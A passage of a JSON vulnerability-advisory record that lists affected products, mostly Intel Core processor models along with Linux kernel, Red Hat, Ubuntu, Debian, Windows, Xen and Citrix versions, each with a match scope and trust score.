        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "750s"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5550u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3120m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4340te"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4590"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3520m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3555le"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5775r"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2330e"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4150"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7820hk"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "430m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6440hq"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2400"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4200m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4308u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "540"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4330"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "760"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4670s"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4578u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2500k"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "965"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3635qm"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4670t"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "940"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4100e"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2540m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3340"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3340m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100h"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4210u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6442eq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "720qm"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2377m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "880"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3630qm"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4702ec"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "860"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7500u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770t"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4765t"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2310e"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "550"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3220t"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "470um"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2410m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4690k"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "520um"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2105"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4510u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770k"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3217ue"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3250t"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8100"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4440"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3720qm"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2120"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4400e"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3770s"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4030u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6167u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4340m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2515e"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5157u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610y"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3337u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "580m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "750"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2400s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6300u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5200u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3240t"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5557u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4910mq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3740qm"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4870hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4750hq"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6098p"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4025u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4430s"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2635qm"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "520m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3229y"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4102e"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3320m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3770t"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4558u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3427u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4302y"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6260u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "330e"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3339y"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4710hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8700k"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8650u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4258u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2330m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4010u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570t"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3240"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2557m"
      },
      {
        "model": "core m7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6y75"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "380m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2450m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620lm"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4460"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6267u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7567u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3840qm"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5250u"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "12.04"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2357m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "940xm"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2340ue"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5010u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4300u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4100m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6287u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3550"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3610qe"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5020u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2500s"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "870"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "970"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4330te"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3570t"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4110e"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6500te"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2670qm"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "920xm"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3120me"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5015u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "660um"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4850hq"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6500"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2920xm"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2537m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4220y"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100te"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3632qm"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4790s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570te"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6440eq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7700hq"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4300m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100e"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2500t"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4700ec"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5850hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5850eq"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4690"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "540m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "655k"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3770k"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6500t"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4370t"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2320"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4200y"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3470"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4440s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6400"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2600s"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4700eq"
      },
      {
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y71"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3245"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3570"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3217u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4410e"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2365m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6685r"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770hq"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2370m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4402ec"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4170"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620ue"
      },
      {
        "model": "core microprocessors",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "intel",
        "version": "0"
      },
      {
        "model": "core i3",
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.8"
      },
      {
        "model": "windows server r2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20120"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.7"
      },
      {
        "model": "enterprise linux for ibm z systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel 4.11-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 4.11-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.5"
      },
      {
        "model": "kernel 4.9-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "enterprise linux server extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.1"
      },
      {
        "model": "kernel 4.14-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.5"
      },
      {
        "model": "enterprise linux for scientific computing",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.10"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel 4.10-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.3"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.10"
      },
      {
        "model": "kernel 4.9-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "enterprise linux for power big endian extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.5"
      },
      {
        "model": "kernel 4.11-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9"
      },
      {
        "model": "kernel 4.9-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "windows for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "8.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16.11"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16"
      },
      {
        "model": "xenserver ltsr cu1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "7.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.2"
      },
      {
        "model": "virtualization host",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "windows server r2 for x64-based systems sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.91"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13"
      },
      {
        "model": "enterprise linux for ibm z systems extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.5"
      },
      {
        "model": "kernel 4.11-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "enterprise linux for power little endian extended update supp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11"
      },
      {
        "model": "enterprise linux for power little endian",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.12"
      },
      {
        "model": "kernel 4.14.0-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 4.16-rc",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 4.11-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.6"
      },
      {
        "model": "windows for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "100"
      },
      {
        "model": "kernel",
